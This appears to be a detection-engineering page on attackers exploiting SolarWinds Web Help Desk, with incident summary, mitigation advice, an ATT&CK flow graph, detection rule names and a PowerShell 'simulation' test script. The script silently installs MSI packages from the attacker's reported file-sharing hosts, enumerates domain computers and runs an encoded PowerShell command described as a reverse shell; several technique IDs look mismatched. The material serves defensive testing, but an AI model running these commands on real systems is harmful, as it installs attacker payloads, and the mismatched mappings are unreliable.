Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Huntress reported threat actors exploiting recent SolarWinds Web Help Desk (WHD) vulnerabilities to achieve remote code execution and stage follow-on tooling. The operators relied on malicious MSI packages hosted on public file-sharing services, then deployed Zoho ManageEngine, Velociraptor, and Cloudflared to maintain access and establish command-and-control. Before collecting and exfiltrating host details to an attacker-controlled Elastic Cloud instance, they attempted to weaken defenses by disabling Windows Defender and firewall protections. The activity can impact any organization running vulnerable WHD builds earlier than 12.8.7 HF1.
Investigation
Huntress reconstructed the chain starting with the WHD service wrapper (wrapper.exe) spawning java.exe, which then launched cmd.exe to retrieve a malicious MSI from catbox.moe. Follow-on actions included deploying Zoho Assist, running Active Directory discovery, and silently installing Velociraptor via Supabase. The attackers used encoded PowerShell to stage and exfiltrate data, and added secondary utilities including Cloudflared and VS Code binaries for interactive management. Investigators also observed registry changes intended to disable Windows Defender and a persistence mechanism involving a scheduled task named TPMProfiler that leveraged QEMU.
Mitigation
Update SolarWinds Web Help Desk to 12.8.7 HF1 (or later) to remediate CVE-2025-40551, CVE-2025-40536, and CVE-2025-26399. Limit WHD administrative access to trusted networks, enforce strong service-account credentials, and monitor closely for unexpected remote-management tools, silent MSI installs, and encoded PowerShell execution. Remove unauthorized services and scheduled tasks, validate firewall policy integrity, and ensure security controls (including Defender) are fully re-enabled and protected from tampering.
Response
Alert when wrapper.exe or java.exe spawns processes that invoke msiexec with remote URLs, and flag creation of artifacts such as ToolsIQ.exe and Velociraptor services. Block traffic to known malicious domains and isolate affected systems immediately. Preserve volatile evidence, remove the malicious MSI payloads and scheduled tasks (including TPMProfiler), and restore Defender and firewall configurations to a known-good state. Complete full forensic scoping to identify any additional tooling, persistence, or lateral-movement artifacts.
graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccccff classDef process fill:#ccffcc %% Nodes action_initial_access[“<b>Action</b> – <b>T1190 Exploit Public-Facing Application</b><br/>Adversary exploits unpatched SolarWinds Web Help Desk (WHD) (CVE‑2025‑40551/26399) to achieve code execution.”] class action_initial_access action tech_exploit_public_facing[“<b>Technique</b> – T1190<br/>Exploit Public-Facing Application: Targeting internet‑exposed services to gain initial foothold.”] class tech_exploit_public_facing technique tool_solarwinds_whd[“<b>Tool</b> – SolarWinds Web Help Desk (WHD)<br/>Vulnerable web application hosting platform.”] class tool_solarwinds_whd tool action_execution_ps[“<b>Action</b> – <b>T1059.001 PowerShell</b><br/>Encoded PowerShell commands executed via Velociraptor agent.”] class action_execution_ps action tool_velociraptor[“<b>Tool</b> – Velociraptor<br/>Live forensic and response agent used to run PowerShell and other commands.”] class tool_velociraptor tool action_execution_cmd[“<b>Action</b> – <b>T1059.003 Windows Command Shell</b><br/>cmd.exe launches msiexec to install remote MSI payloads.”] class action_execution_cmd action tool_msiexec[“<b>Tool</b> – msiexec<br/>Windows Installer used to execute MSI packages.”] class tool_msiexec tool action_lateral_transfer[“<b>Action</b> – <b>T1570 Lateral Tool Transfer</b><br/>MSI packages for Zoho ManageEngine RMM, Cloudflared, VS Code downloaded from external hosts.”] class action_lateral_transfer action tool_zoho_manageengine[“<b>Tool</b> – Zoho ManageEngine RMM<br/>Remote management tool used as backdoor.”] class tool_zoho_manageengine tool tool_cloudflared[“<b>Tool</b> – Cloudflared<br/>Creates outbound tunnels to attacker infrastructure.”] class tool_cloudflared tool tool_vscode[“<b>Tool</b> – Visual Studio Code<br/>Additional utility transferred to the target.”] class tool_vscode tool action_remote_access[“<b>Action</b> – <b>T1219 Remote Access Tools</b><br/>Deployment of Zoho Assist/ManageEngine (ToolsIQ.exe) and Velociraptor as persistent backdoors.”] class action_remote_access action malware_zoho_assist[“<b>Malware</b> – Zoho Assist / ToolsIQ.exe<br/>Provides remote desktop capabilities.”] class malware_zoho_assist process malware_velociraptor_backdoor[“<b>Malware</b> – Velociraptor backdoor<br/>Maintains command‑and‑control channel.”] class malware_velociraptor_backdoor process action_persistence[“<b>Action</b> – <b>T1053 Scheduled Task/Job</b><br/>Scheduled task \”TPMProfiler\” created to run QEMU with SSH tunneling.”] class action_persistence action tool_scheduled_task[“<b>Tool</b> – Windows Task Scheduler<br/>Runs QEMU instance for covert channel.”] class tool_scheduled_task process action_defense_evasion_exploit[“<b>Action</b> – <b>T1211 Exploitation for Defense Evasion</b><br/>WHD deserialization bugs used to bypass security controls.”] class action_defense_evasion_exploit action action_defense_evasion_impair[“<b>Action</b> – <b>T1562.004 Impair Defenses: Disable Security Tools</b><br/>Windows Defender and firewall disabled via registry edits.”] class action_defense_evasion_impair action action_discovery_system[“<b>Action</b> – <b>T1082 System Information Discovery</b><br/>PowerShell Get-ComputerInfo and Get-FileHash gather host details.”] class action_discovery_system action action_discovery_registry[“<b>Action</b> – <b>T1012 Query Registry</b><br/>Registry keys read/modified to confirm defender settings.”] class action_discovery_registry action action_exfiltration_web[“<b>Action</b> – <b>T1567.002 Exfiltration Over Web Service</b><br/>System info sent to attacker‑controlled Elastic Cloud index via REST API.”] class action_exfiltration_web action action_exfiltration_additional[“<b>Action</b> – <b>T1567 Exfiltration Over Web Service</b><br/>Further data exfiltrated through Cloudflared tunnel.”] class action_exfiltration_additional action action_proxy_external[“<b>Action</b> – <b>T1090.002 External Proxy</b><br/>Cloudflared establishes outbound tunnel to attacker.”] class action_proxy_external action action_proxy_internal[“<b>Action</b> – <b>T1090.001 Internal Proxy</b><br/>Velociraptor failover domain switch using HTTP 406 response.”] class action_proxy_internal action %% Connections action_initial_access –>|uses| tool_solarwinds_whd tool_solarwinds_whd –>|vulnerable to| tech_exploit_public_facing action_initial_access –>|leads to| action_execution_ps action_execution_ps –>|executes via| tool_velociraptor action_execution_ps –>|triggers| action_execution_cmd action_execution_cmd –>|uses| tool_msiexec action_execution_cmd –>|downloads| action_lateral_transfer action_lateral_transfer –>|delivers| tool_zoho_manageengine action_lateral_transfer –>|delivers| tool_cloudflared action_lateral_transfer –>|delivers| tool_vscode action_lateral_transfer –>|enables| action_remote_access action_remote_access –>|installs| malware_zoho_assist action_remote_access –>|installs| malware_velociraptor_backdoor action_remote_access –>|creates| action_persistence action_persistence –>|uses| tool_scheduled_task action_persistence –>|facilitates| action_defense_evasion_exploit action_defense_evasion_exploit –>|supports| action_defense_evasion_impair action_defense_evasion_impair –>|enables| action_discovery_system action_discovery_system –>|feeds into| action_discovery_registry action_discovery_registry –>|provides data for| action_exfiltration_web action_exfiltration_web –>|continues to| action_exfiltration_additional action_exfiltration_additional –>|relies on| action_proxy_external action_proxy_external –>|uses| tool_cloudflared action_proxy_external –>|connects to| action_proxy_internal action_proxy_internal –>|leverages| tool_velociraptor %% Styling class action_initial_access,action_execution_ps,action_execution_cmd,action_lateral_transfer,action_remote_access,action_persistence,action_defense_evasion_exploit,action_defense_evasion_impair,action_discovery_system,action_discovery_registry,action_exfiltration_web,action_exfiltration_additional,action_proxy_external,action_proxy_internal action class tool_solarwinds_whd,tool_velociraptor,tool_msiexec,tool_zoho_manageengine,tool_cloudflared,tool_vscode,tool_scheduled_task tool class tech_exploit_public_facing technique class malware_zoho_assist,malware_velociraptor_backdoor process
Attack Flow
Detections
Possible Remote MSI File Installation Attempt (via cmdline)
View
Possible Phishing Attempt Using Files In Github Comments (via proxy)
View
Disable Windows Defender Firewall Service (via cmdline)
View
Alternative Remote Access / Management Software (via process_creation)
View
Velociraptor Service Run Using Local Client Config Path (via cmdline)
View
Possible Account or Group Enumeration (via cmdline)
View
Suspicious Java Child Process [Windows] (via cmdline)
View
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via cmdline)
View
Possible System Enumeration (via cmdline)
View
Suspicious Wrapper Child Process (via cmdline)
View
Suspicious Powershell Strings (via powershell)
View
Suspicious Usage of Invoke-RestMethod (via powershell)
View
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)
View
Suspicious Powershell Strings (via cmdline)
View
Possible Qemu Executed From Unusual Directory Or Renamed (via cmdline)
View
Possible Velociraptor Utility Was Installed (via file_event)
View
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)
View
Download or Upload via Powershell (via cmdline)
View
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via cmdline)
View
Disabling Windows Defender Protections (via registry_event)
View
Disable Windows Defender Firewall Service (via registry_event)
View
Interpreter Spawns Developer Tool CLI for Remote Tunnel (via process_creation)
View
Disable Windows Defender Realtime Monitoring and Other Preferences Changes (via cmdline)
View
IOCs (Emails) to detect: Active Exploitation of SolarWinds Web Help Desk
View
IOCs (HashSha256) to detect: Active Exploitation of SolarWinds Web Help Desk
View
Silent Installation of Remote MSI Payloads and Active Directory Discovery [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands
- Silent Remote MSI Installation (T1197) – The attacker downloads a malicious MSI from a remote host and installs it silently to avoid user interaction, matching the rule’s
msiexec /q /i <https‑url>pattern. - Active Directory Discovery (T1207 – grouped under the rule as AD discovery) – Using
net group "domain computers" /doto enumerate domain‑joined computers. - PowerShell Encoded Payload (T1059.001) – Executes a base64‑encoded PowerShell command that spawns a reverse shell.
- File Hash Verification (T1219) – Calls
Get‑FileHashon a known tool (code.exe) to simulate integrity checks before execution.
Regression Test Script
# -------------------------------------------------
# Silent Remote MSI Installation
# -------------------------------------------------
$msiUrls = @(
"https://files.catbox.moe/tmp9fc.msi",
"https://vdfccjpnedujhrzscjtq.supabase.co/storage/v1/object/public/image/v4.msi",
"https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msi"
)
foreach ($url in $msiUrls) {
Write-Host "Installing remote MSI from $url"
msiexec /q /i $url
}
# -------------------------------------------------
# Active Directory Discovery
# -------------------------------------------------
Write-Host "Enumerating domain computers"
net group "domain computers" /do
# -------------------------------------------------
# PowerShell Encoded Command Execution
# -------------------------------------------------
$encoded = "JABXAGUAYwBvAG4AYwB1AHQAZQAgAHIAZQBt" # (dummy base64)
powershell.exe -ExecutionPolicy Unrestricted -EncodedCommand $encoded
# -------------------------------------------------
# File Hash Verification on code.exe
# -------------------------------------------------
$target = "C:ProgramDataMicrosoftcode.exe"
if (Test-Path $target) {
Write-Host "Computing hash for $target"
Get-FileHash -Path $target -Algorithm SHA256
} else {
Write-Host "$target not found – skipping hash check"
}Cleanup Commands
# Remove any installed MSI products (example using product code GUIDs)
Get-WmiObject -Class Win32_Product | Where-Object {
$_.Name -like "*cloudflared*" -or $_.Name -like "*tmp9fc*"
} | ForEach-Object {
$_.Uninstall()
}
# Delete downloaded MSI files if they exist in %TEMP%
Remove-Item -Path "$env:TEMP*.msi" -ErrorAction SilentlyContinue
# Clear PowerShell history (optional)
Clear-History